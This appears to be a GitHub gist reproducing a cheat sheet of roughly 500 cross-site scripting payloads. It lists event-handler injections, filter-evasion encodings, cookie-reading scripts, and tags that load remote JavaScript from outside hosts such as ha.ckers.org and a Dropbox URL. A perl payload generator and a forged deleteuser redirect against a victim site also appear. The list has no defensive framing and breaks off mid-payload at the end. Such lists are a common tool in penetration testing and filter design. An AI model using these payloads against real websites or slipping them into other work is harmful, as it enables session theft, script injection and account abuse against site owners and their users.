Last active
April 21, 2024 05:15
-
-
Save phra/76518994c908ac836ec5a393f188f89a to your computer and use it in GitHub Desktop.
#500 XSS payloads - https://gbhackers.com/top-500-important-xss-cheat-sheet/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body oninput=javascript:alert(1)><input autofocus> | |
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
<frameset onload=javascript:alert(1)> | |
<table background="javascript:javascript:alert(1)"> | |
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
<![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
<style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> | |
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> | |
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> | |
<object data="data:text/html;base64,%(base64)s"> | |
<embed src="data:text/html;base64,%(base64)s"> | |
<b <script>alert(1)</script>0 | |
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | |
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> | |
<embed src="javascript:alert(1)"> | |
<img src="javascript:alert(1)"> | |
<image src="javascript:alert(1)"> | |
<script src="javascript:alert(1)"> | |
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x | |
<? foo="><script>javascript:alert(1)</script>"> | |
<! foo="><script>javascript:alert(1)</script>"> | |
</ foo="><script>javascript:alert(1)</script>"> | |
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> | |
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> | |
<% foo><x foo="%><script>javascript:alert(1)</script>"> | |
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> | |
<img \x00src=x onerror="alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x11src=x onerror="javascript:alert(1)"> | |
<img \x12src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x10src=x onerror="javascript:alert(1)"> | |
<img\x13src=x onerror="javascript:alert(1)"> | |
<img\x32src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x11src=x onerror="javascript:alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x34src=x onerror="javascript:alert(1)"> | |
<img \x39src=x onerror="javascript:alert(1)"> | |
<img \x00src=x onerror="javascript:alert(1)"> | |
<img src\x09=x onerror="javascript:alert(1)"> | |
<img src\x10=x onerror="javascript:alert(1)"> | |
<img src\x13=x onerror="javascript:alert(1)"> | |
<img src\x32=x onerror="javascript:alert(1)"> | |
<img src\x12=x onerror="javascript:alert(1)"> | |
<img src\x11=x onerror="javascript:alert(1)"> | |
<img src\x00=x onerror="javascript:alert(1)"> | |
<img src\x47=x onerror="javascript:alert(1)"> | |
<img src=x\x09onerror="javascript:alert(1)"> | |
<img src=x\x10onerror="javascript:alert(1)"> | |
<img src=x\x11onerror="javascript:alert(1)"> | |
<img src=x\x12onerror="javascript:alert(1)"> | |
<img src=x\x13onerror="javascript:alert(1)"> | |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | |
<img src=x onerror=\x09"javascript:alert(1)"> | |
<img src=x onerror=\x10"javascript:alert(1)"> | |
<img src=x onerror=\x11"javascript:alert(1)"> | |
<img src=x onerror=\x12"javascript:alert(1)"> | |
<img src=x onerror=\x32"javascript:alert(1)"> | |
<img src=x onerror=\x00"javascript:alert(1)"> | |
<a href=javascript:javascript:alert(1)>XXX</a> | |
<img src="x` `<script>javascript:alert(1)</script>"` `> | |
<img src onerror /" '"= alt=javascript:alert(1)//"> | |
<title onpropertychange=javascript:alert(1)></title><title title=> | |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | |
<!--[if]><script>javascript:alert(1)</script --> | |
<!--[if<img src=x onerror=javascript:alert(1)//]> --> | |
<script src="/\%(jscript)s"></script> | |
<script src="\\%(jscript)s"></script> | |
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> | |
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X | |
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> | |
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d | |
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> | |
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> | |
<style>*[{}@import'%(css)s?]</style>X | |
<div style="font-family:'foo ;color:red;';">XXX | |
<div style="font-family:foo}color=red;">XXX | |
<// style=x:expression\28javascript:alert(1)\29> | |
<style>*{x:expression(javascript:alert(1))}</style> | |
<div style=content:url(%(svg)s)></div> | |
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X | |
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> | |
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X | |
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X | |
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> | |
<x style="background:url('x;color:red;/*')">XXX</x> | |
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> | |
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> | |
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> | |
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> | |
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi | |
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> | |
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ | |
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > | |
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
\";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
¼script¾alert(¢XSS¢)¼/script¾ | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> | |
<iframe src="	javascript:prompt(1)	"> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt >alert(1) {Opera} | |
<img/src=`` onerror=this.onerror=confirm(1) | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=``
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /**/>/**/alert(1)/**/</script /**/ | |
"><h1/onmouseover='\u0061lert(1)'> | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X | |
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe// src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
'';!--"<XSS>=&{()} | |
'>//\\,<'>">">"*" | |
'); alert('XSS | |
<script>alert(1);</script> | |
<script>alert('XSS');</script> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<scr<script>ipt>alert('XSS');</scr</script>ipt> | |
<script>alert(String.fromCharCode(88,83,83))</script> | |
<img src=foo.png onerror=alert(/xssed/) /> | |
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> | |
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> | |
<marquee><script>alert('XSS')</script></marquee> | |
<IMG SRC=\"jav	ascript:alert('XSS');\"> | |
<IMG SRC=\"jav
ascript:alert('XSS');\"> | |
<IMG SRC=\"jav
ascript:alert('XSS');\"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
"><script>alert(0)</script> | |
<script src=http://yoursite.com/your_files.js></script> | |
</title><script>alert(/xss/)</script> | |
</textarea><script>alert(/xss/)</script> | |
<IMG LOWSRC=\"javascript:alert('XSS')\"> | |
<IMG DYNSRC=\"javascript:alert('XSS')\"> | |
<font style='color:expression(alert(document.cookie))'> | |
<img src="javascript:alert('XSS')"> | |
<script language="JavaScript">alert('XSS')</script> | |
<body onunload="javascript:alert('XSS');"> | |
<body onLoad="alert('XSS');" | |
[color=red' onmouseover="alert('xss')"]mouse over[/color] | |
"/></a></><img src=1.gif onerror=alert(1)> | |
window.alert("Bonjour !"); | |
<div style="x:expression((window.r==1)?'':eval('r=1; | |
alert(String.fromCharCode(88,83,83));'))"> | |
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> | |
"><script alert(String.fromCharCode(88,83,83))</script> | |
'>><marquee><h1>XSS</h1></marquee> | |
'">><script>alert('XSS')</script> | |
'">><marquee><h1>XSS</h1></marquee> | |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> | |
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> | |
<script>var var = 1; alert(var)</script> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<?='<SCRIPT>alert("XSS")</SCRIPT>'?> | |
<IMG SRC='vbscript:msgbox(\"XSS\")'> | |
" onfocus=alert(document.domain) "> <" | |
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> | |
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS | |
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out | |
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out | |
<br size=\"&{alert('XSS')}\"> | |
<scrscriptipt>alert(1)</scrscriptipt> | |
</br style=a:expression(alert())> | |
</script><script>alert(1)</script> | |
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
[color=red width=expression(alert(123))][color] | |
<BASE HREF="javascript:alert('XSS');//"> | |
Execute(MsgBox(chr(88)&chr(83)&chr(83)))< | |
"></iframe><script>alert(123)</script> | |
<body onLoad="while(true) alert('XSS');"> | |
'"></title><script>alert(1111)</script> | |
</textarea>'"><script>alert(document.cookie)</script> | |
'""><script language="JavaScript"> alert('X \nS \nS');</script> | |
</script></script><<<<script><>>>><<<script>alert(123)</script> | |
<html><noalert><noscript>(123)</noscript><script>(123)</script> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
'></select><script>alert(123)</script> | |
'>"><script src = 'http://www.site.com/XSS.js'></script> | |
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> | |
<SCRIPT>document.write("XSS");</SCRIPT> | |
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); | |
='><script>alert("xss")</script> | |
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> | |
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> | |
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> | |
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> | |
src="http://www.site.com/XSS.js"></script> | |
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= | |
!--" /><script>alert('xss');</script> | |
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> | |
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> | |
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> | |
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> | |
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> | |
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> | |
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> | |
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> | |
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' | |
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" | |
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' | |
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? | |
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? | |
'); alert('xss'); var x=' | |
\\'); alert(\'xss\');var x=\' | |
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); | |
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> | |
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u